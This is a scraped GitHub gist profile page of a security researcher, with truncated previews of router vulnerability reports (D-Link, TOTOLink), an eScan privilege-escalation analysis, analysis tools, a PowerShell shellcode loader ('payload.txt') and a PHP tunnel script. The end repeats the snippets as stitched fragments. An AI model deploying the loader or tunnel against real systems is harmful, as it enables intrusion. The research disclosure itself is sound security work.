Nong Hoang Tu dmknght

## dlink_dir-600m_bof.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                dmknght
                / dlink_dir-600m_bof.md
            
            
              Last active
              February 14, 2024 12:40
            
          
    Device info


Device model: DIR-600M C1
Firmware version: 3.08
Download link: https://dlink.co.in/firmware/ftp.aspx

Description and impact

Dlink DIR-600M C1 has buffer overflow in authentication that allows unauthenticated attacker to performce Denial of Service attack. Attacker can send payload to web login or telnet login (which is disabled by default). This vulnerability is as same as
CVE-2021-26709 which possibly leads to unauthenticated remote code execution.
Steps to reprocedure


## scan_ports_with_bash.sh
#!/bin/bash

# Example of using bash with array
port_arr=(80 22 3306)
max_timeout=2 # Timeout requires coreutils (on Debian-based system)

function do_scan_port {
  # If use array like above, use the line above
  for port in "${port_arr[@]}"; do
  # Otherwise, use the port range

## yr_find_creds.nim
import .. / src / engine / libyara # Binding lib co san. Neu tai ve thi sua cho nay, lay binding o day https://github.com/dmknght/nimyara
import strformat
import os

# Pass vao compiler de link voi thu vien Yara
{.passL: "-lyara".}
type
  COMPILER_RESULT = object
    errors: int
    warnings: int

## WinDef_Extractor.cpp
/*
Forked from https://github.com/hongson11698/defender-database-extract/
- Fixed some buffer overflow in sprintf
- Compile: g++ extract_sig.cpp -o extract_sig -Wall -lstdc++fs
- Usage: ./extract_sig <dir to write result> <extracted av/as base> <optional: extracted av/as dlta>
If both av and dlta is defined, the program will merge both of them to make a final db
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

## qiling_to_dump.py
from qiling import *
from qiling.const import *
from unicorn.x86_const import UC_X86_INS_SYSCALL # https://github.com/unicorn-engine/unicorn/blob/master/bindings/python/unicorn/x86_const.py
import argparse
import yara


def mem_scan(ql: Qiling, address: int, size: int, yr_pointer) -> None:
    buf = ql.mem.read(address, size)
    for insn in ql.arch.disassembler.disasm(buf, address):

## totolink_bypass_to_rce.md

      
              1 file
            
          
              0 forks
            
          
              5 comments
            
          
              1 star
            
          
                dmknght
                / totolink_bypass_to_rce.md
            
            
              Last active
              October 26, 2023 00:05
            
              
                Use format string bypass Totolink's Validity_check function, lead to remote OS command injection (CVE-2023-4746)
              
          
    Firmware info


Device name: N200RE V5
Build version: V9.3.5u.6437_B20230519 (Update 2023-05-26
Download link: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/204/ids/36.html
Authentication: Yes (Login as account on firmware's web interface)
Affect: Unknown number of ToTotlink firmware that uses function Validity_check.

Description and Impact

Totolink is using function Validity_check to fix OS command injection vulnerability. An attacker can bypass this filter using character %, exploit the format string at snprintf function to execute OS system commands.

  
## payload.txt
$rzJEzfsIm = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

$ozmjNQUHYWcWLEB = Add-Type -memberDefinition $rzJEzfsIm -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $bwHCjeufl = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0

## tunnel.php
<?php
ini_set("allow_url_fopen", true);
ini_set("allow_url_include", true);
ini_set('always_populate_raw_post_data', -1);
error_reporting(E_ERROR | E_PARSE);

if(version_compare(PHP_VERSION,'5.4.0','>='))@http_response_code(200);

function blv_decode($data) {
    $data_len = strlen($data);

## totolink_ex1200L.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                dmknght
                / totolink_ex1200L.md
            
            
              Last active
              August 27, 2023 08:09
            
              
                Multiple OS command Injection in TOTOLink EX1200L firmware
              
          
    Research info

Firmware


Build version: EN_V9.3.5u.6146_B20201023
Download URL: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/217/ids/36.html

Description and impact

These vulnerabilities allow attacker executes remote OS command as root. The build version was 2020 so It's possibly attacker can send unauthenticated requests to cgi-bin
Root-cause

Totolink's cgi-bin shares the code with other firmware. While the other firmware was analyzed, reported by researchers (and fixed), this firmware wasn't fixed by Totolink company.

  
## escan_analysis_cbjs.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              3 stars
            
          
                dmknght
                / escan_analysis_cbjs.md
            
            
              Last active
              February 28, 2024 09:37
            
              
                Phân tích lỗ hổng priv esc trong escan 7.0.32
              
          
    I. Overview


Ứng ụng có một số file có suid bit với owner root. Vì vậy, attacker có thể lợi dụng lỗ hổng trong các file này để leo thang dặc quyền.
Goal: Tạo được reverse shell với quyền root

II. Analysis

1. Cách hoạt động của runasroot (công cụ: cutter, ghidra)

Note: cutter (backend là rizin framework) sử dụng bộ framework capstone của anh Anh Quỳnh để phân tích và dịch ngược ra assembly code. Trong khi đó, Ghidra sử dụng bộ từ điển Sleigh riêng. Trong một một số trường hợp, kết quả dịch ngược của cùng 1 binary file khi sử dụng 2 framework này là khác nhau.
runasroot là một file ELF có chứa suid bit và sgid bit
	#!/bin/bash

	# Example of using bash with array
	port_arr=(80 22 3306)
	max_timeout=2 # Timeout requires coreutils (on Debian-based system)

	function do_scan_port {
	# If use array like above, use the line above
	for port in "${port_arr[@]}"; do
	# Otherwise, use the port range
	import .. / src / engine / libyara # Binding lib co san. Neu tai ve thi sua cho nay, lay binding o day https://github.com/dmknght/nimyara
	import strformat
	import os

	# Pass vao compiler de link voi thu vien Yara
	{.passL: "-lyara".}
	type
	COMPILER_RESULT = object
	errors: int
	warnings: int
	/*
	Forked from https://github.com/hongson11698/defender-database-extract/
	- Fixed some buffer overflow in sprintf
	- Compile: g++ extract_sig.cpp -o extract_sig -Wall -lstdc++fs
	- Usage: ./extract_sig <dir to write result> <extracted av/as base> <optional: extracted av/as dlta>
	If both av and dlta is defined, the program will merge both of them to make a final db
	*/
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	from qiling import *
	from qiling.const import *
	from unicorn.x86_const import UC_X86_INS_SYSCALL # https://github.com/unicorn-engine/unicorn/blob/master/bindings/python/unicorn/x86_const.py
	import argparse
	import yara


	def mem_scan(ql: Qiling, address: int, size: int, yr_pointer) -> None:
	buf = ql.mem.read(address, size)
	for insn in ql.arch.disassembler.disasm(buf, address):
	$rzJEzfsIm = @"
	[DllImport("kernel32.dll")]
	public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
	[DllImport("kernel32.dll")]
	public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
	"@

	$ozmjNQUHYWcWLEB = Add-Type -memberDefinition $rzJEzfsIm -Name "Win32" -namespace Win32Functions -passthru

	[Byte[]] $bwHCjeufl = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0
	<?php
	ini_set("allow_url_fopen", true);
	ini_set("allow_url_include", true);
	ini_set('always_populate_raw_post_data', -1);
	error_reporting(E_ERROR \| E_PARSE);

	if(version_compare(PHP_VERSION,'5.4.0','>='))@http_response_code(200);

	function blv_decode($data) {
	$data_len = strlen($data);